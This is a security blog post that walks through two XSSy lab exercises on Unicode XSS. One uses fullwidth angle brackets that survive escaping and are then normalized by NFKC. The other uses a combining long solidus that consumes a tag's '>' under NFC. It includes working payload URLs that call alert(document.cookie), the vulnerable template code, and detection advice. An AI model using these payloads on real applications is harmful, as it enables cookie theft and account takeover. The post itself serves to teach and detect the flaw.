Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.
Lab: https://4t64ubva.xssy.uk/
A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:
GET /target.ftl?name=foo<i>bar HTTP/2
Host: 4t64ubva.xssy.uk
...
HTTP/2 200 OK
Content-Length: 359
...
<h1>Unicode XSS</h1>
<p>Hello foo<i>bar</p>
</body>
This would generally indicate that XSS is not possible. However, lets try the Unicode XSS technique. Instead of a regular less-than sign, we want to use Unicode fullwidth-less-than-sign, which is U+FF1C. To use this within a GET parameter, we need to UTF-8 encode, and then URL encode the character, and we can use a quick bit of Python to do so:
>>> '\uFF1C'
'<'
>>> '\uFF1C'.encode('utf-8')
b'\xef\xbc\x9c'
>>> urllib.parse.quote('\uFF1C'.encode('utf-8'))
'%EF%BC%9C'
Now we can send our payload and observe the result:
GET /target.ftl?name=%EF%BC%9C HTTP/2
Host: 4t64ubva.xssy.uk
...
HTTP/2 200 OK
Content-Length: 345
...
<h1>Unicode XSS</h1>
<p>Hello <</p>
</body>
Interestingly, the Unicode character has been converted to a regular character, and this has avoided HTML escaping. This is a strong indicator of XSS and we can construct a payload that will call alert(document.cookie) The full payload is:
https://4t64ubva.xssy.uk/target.ftl?name=%EF%BC%9Cscript%EF%BC%9Ealert(document.cookie)%EF%BC%9C/script%EF%BC%9E
Visiting this URL results in a browser popup, demonstrating successful exploitation:
Now we have an exploit, this leads to the question: why is this vulnerable? Here is the source code to target.ftl:
<html>
<head><title>Unicode XSS</title></head>
<body>
<h1>Unicode XSS</h1>
<p>Hello ${normalizeNFKC(request.queryParameters.name!?html)}</p>
</body>
</html>
What is happening is that first the application is performing HTML escaping, using the ?html FreeMarker directive. Then it is calling normalizeNFKC, which is performing Unicode normalization. The NFKC form is for “compatibility composition” and replaces some characters with near-enough alternatives – including replacing fullwidth forms with their regular companions.
When this occurs in the wild, it is normally due to a framework component performing normalization. One example of this is SQL Server, which automatically applies normalization when a Unicode string in stored in a VARCHAR column.
One approach to detection is to include a fullwidth-less-than-sign payload with a scan. Some scanners include this payload; some do not. Although the vulnerability is rare, it probably is worth including it. In my Coding Burp Extensions workshop, I cover writing a custom Burp scanner check for this issue.
Another approach is to detect Unicode normalization, and report this as interesting behaviour for manual investigation. It’s possible that normalization is taking place, but in a way that’s not vulnerable to XSS, or not vulnerable to this exact payload.
Lab: https://4t64ubva.xssy.uk/
We can start by attempting the payload from the previous lab:
GET /target.ftl?name=%EF%BC%9Cscript%EF%BC%9Ealert(document.cookie)%EF%BC%9C/script%EF%BC%9E HTTP/2
Host: ozb2apmi.xssy.uk
...
HTTP/2 200 OK
Content-Length: 489
...
Enter your name:
<textarea name="name"><script>alert(document.cookie)</script></textarea>
The less-than and greater-than characters are the Unicode fullwidth characters, without any transformation. No browser interprets that as an HTML tag, so this payload can't inject script.
Let’s try to identify if any Unicode normalization is occurring. We’ll start by using Python to explore how NFC and NFD work. A simple character to use is latin-capital-a-with-acute - U+00C1.
>>> unicodedata.normalize('NFD', '\u00C1')
'Á'
>>> len(unicodedata.normalize('NFD', '\u00C1'))
2
>>> hex(ord(unicodedata.normalize('NFD', '\u00C1')[0]))
'0x41'
>>> hex(ord(unicodedata.normalize('NFD', '\u00C1')[1]))
'0x301'
We can see that NFD breaks this character into two: latin-capital-a, and combining-acute-accent. NFC does the opposite:
>>> unicodedata.normalize('NFC', '\u0041\u0301')
'Á'
>>> len(unicodedata.normalize('NFC', '\u0041\u0301'))
1
We can probe the application by including these sequences in a payload, bearing in mind we need to UTF-8 and URL encode the characters:
>>> urllib.parse.quote('\u00c1 \u0041\u0301'.encode('utf-8'))
'%C3%81%20A%CC%81'
GET /target.ftl?name=%C3%81%20A%CC%81 HTTP/2
Host: ozb2apmi.xssy.uk
HTTP/2 200 OK
Content-Length: 447
...
Enter your name:
<textarea name="name">Á Á</textarea>
If we look at the hex source, we can see both A’s have the C381 code which is the UTF-8 encoding for latin-capital-a-with-acute. So we can infer that the application has normalized the data using NFC.
We can also see that our payload appears immediately after the textarea tag. So, is there any combining character that will combine with a greater-than character? We can use some Python to search for this:
>>> for i in range(65535):
... q = unicodedata.normalize('NFC', '>' + chr(i))
... if not q.startswith('>'):
... print(hex(i))
...
0x338
And there is a match! Unicode character combining-long-solidus-overlay. Let’s try sending this to the application:
GET /target.ftl?name=%CC%B8 HTTP/2
Host: ozb2apmi.xssy.uk
...
Enter your name:
<textarea name="name"≯</textarea>
The Gist doesn't render the response quite right, but what is happening is that the terminating greater-than character of the textarea tag has been replaced with another character. This means that the user-supplied input is being injected in a tag context.
We can use an onfocus handler, coupled with the autofocus attribute to execute script without requiring user interaction.
https://ozb2apmi.xssy.uk/target.ftl?name=%CC%B8+onfocus="alert(document.cookie)"+autofocus>
Visiting this URL results in a browser popup, demonstrating successful exploitation:
The source code to target.ftl is:
<html>
<head><title>Unicode XSS 2</title></head>
<body>
<h1>Unicode XSS 2</h1>
<form action="target.ftl">Enter your name:
${normalizeNFC("<textarea name=\"name\">" + request.queryParameters.name!?replace("<", "<") + "</textarea>")}
<input type="submit"/>
</form>
</body>
</html>
This has been crafted with certain features to aid exploitation. For example, only less-than is escaped, not greater-than, which helps us balance the textarea tag to make it valid. Also, the user input is concatenated with the surrounding tags before normalization. Still it's not entirely implausible an exploitable variant could be found in the wild.
The Unicode combining character XSS is probably so niche that it's not worth including as a payload in regular scanning. However, the detection of Unicode normalization and the flagging of such behaviour for manual analysis is worthwhile.
I hope you enjoyed reading about this technique and can potentially put it to use some day. There is a lab on XSSy for a third variant of Unicode XSS, which I will blog about some day.